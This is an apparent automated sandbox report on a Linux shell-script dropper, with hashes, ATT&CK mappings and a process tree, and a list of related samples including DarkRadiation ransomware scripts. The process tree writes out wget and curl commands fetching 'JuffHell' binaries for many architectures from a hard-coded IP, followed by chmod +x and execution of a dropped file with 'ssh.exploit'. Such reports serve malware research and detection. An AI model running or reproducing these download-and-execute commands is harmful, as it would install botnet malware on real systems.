Overview
overview
10Static
static
1030c9166a9f...c55.sh
ubuntu-18.04-amd64
730c9166a9f...c55.sh
debian-9-armhf
730c9166a9f...c55.sh
debian-9-mips
730c9166a9f...c55.sh
debian-9-mipsel
73d93d26bca...b06.sh
ubuntu-18.04-amd64
33d93d26bca...b06.sh
debian-9-armhf
33d93d26bca...b06.sh
debian-9-mips
33d93d26bca...b06.sh
debian-9-mipsel
331.214.157...tor.sh
windows7-x64
331.214.157...tor.sh
windows10-2004-x64
331.214.157...tor.sh
windows7-x64
331.214.157...tor.sh
windows10-2004-x64
331.214.157...or1.sh
windows7-x64
331.214.157...or1.sh
windows10-2004-x64
331.214.157...ode.sh
windows7-x64
331.214.157...ode.sh
windows10-2004-x64
331.214.157...de1.sh
windows7-x64
331.214.157...de1.sh
windows10-2004-x64
331.214.157...rst.sh
ubuntu-18.04-amd64
731.214.157...rst.sh
debian-9-armhf
731.214.157...rst.sh
debian-9-mips
731.214.157...rst.sh
debian-9-mipsel
731.214.157...ond.sh
ubuntu-18.04-amd64
731.214.157...ond.sh
debian-9-armhf
731.214.157...ond.sh
debian-9-mips
731.214.157...ond.sh
debian-9-mipsel
731.214.157...pt3.sh
windows7-x64
331.214.157...pt3.sh
windows10-2004-x64
331.214.157...ile.sh
ubuntu-18.04-amd64
731.214.157...ile.sh
debian-9-armhf
731.214.157...ile.sh
debian-9-mips
731.214.157...ile.sh
debian-9-mipsel
7Analysis
-
max time kernel
40s -
max time network
44s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-10-2024 14:51
Behavioral task
behavioral1
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral5
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral6
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral7
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral8
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral9
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_decryptor.sh
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_decryptor.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor.sh
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor1.sh
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor1.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code.sh
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code1.sh
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code1.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral20
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral21
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral22
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
debian9-mipsel-20240226-en
Behavioral task
behavioral23
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral24
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral25
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral26
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
debian9-mipsel-20240418-en
Behavioral task
behavioral27
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt3.sh
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt3.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral30
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral31
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral32
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
-
Size
3KB
-
MD5
4de883db50a87d2eaf32038a6f48a3cf
-
SHA1
5d786ee84056677315f5eb9315f7a40d7fe8cb94
-
SHA256
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55
-
SHA512
36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 685 chmod 695 chmod 773 chmod 786 chmod 800 chmod 812 chmod 700 chmod 707 chmod 720 chmod 733 chmod 744 chmod 758 chmod 792 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/dayum0x1a5sfd15as1fa 686 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 696 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 701 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 708 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 722 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 734 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 746 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 759 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 774 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 788 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 793 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 802 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 814 dayum0x1a5sfd15as1fa -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 687 wget 692 curl 694 cat -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/JuffHell.x86 curl File opened for modification /tmp/JuffHell.spc curl File opened for modification /tmp/JuffHell.arm6 curl File opened for modification /tmp/JuffHell.arc curl File opened for modification /tmp/JuffHell.mips curl File opened for modification /tmp/JuffHell.mpsl curl File opened for modification /tmp/JuffHell.arm5 curl File opened for modification /tmp/dayum0x1a5sfd15as1fa 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh File opened for modification /tmp/JuffHell.ppc curl File opened for modification /tmp/JuffHell.sh4 curl File opened for modification /tmp/JuffHell.i686 curl File opened for modification /tmp/JuffHell.arm curl File opened for modification /tmp/JuffHell.arm7 curl File opened for modification /tmp/JuffHell.m68k curl
Processes
-
/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh1⤵
- Writes file to tmp directory
PID:659 -
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.x862⤵PID:665
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:677
-
-
/bin/catcat JuffHell.x862⤵PID:683
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:686
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.mips2⤵
- System Network Configuration Discovery
PID:687
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:692
-
-
/bin/catcat JuffHell.mips2⤵
- System Network Configuration Discovery
PID:694
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:696
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.mpsl2⤵PID:697
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/catcat JuffHell.mpsl2⤵PID:699
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:701
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm2⤵PID:702
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/catcat JuffHell.arm2⤵PID:706
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:708
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm52⤵PID:709
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:714
-
-
/bin/catcat JuffHell.arm52⤵PID:719
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:722
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm62⤵PID:723
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/catcat JuffHell.arm62⤵PID:731
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:734
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm72⤵PID:735
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/catcat JuffHell.arm72⤵PID:743
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:746
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.ppc2⤵PID:747
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/catcat JuffHell.ppc2⤵PID:755
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:759
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.m68k2⤵PID:761
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/catcat JuffHell.m68k2⤵PID:771
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:774
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.spc2⤵PID:775
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/catcat JuffHell.spc2⤵PID:784
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.i6862⤵PID:789
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/catcat JuffHell.i6862⤵PID:791
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.sh42⤵PID:794
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/catcat JuffHell.sh42⤵PID:799
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:802
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arc2⤵PID:803
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/catcat JuffHell.arc2⤵PID:811
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:814
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162B
MD54f8e702cc244ec5d4de32740c0ecbd97
SHA13adb1f02d5b6054de0046e367c1d687b6cdf7aff
SHA2569e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
SHA51221047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f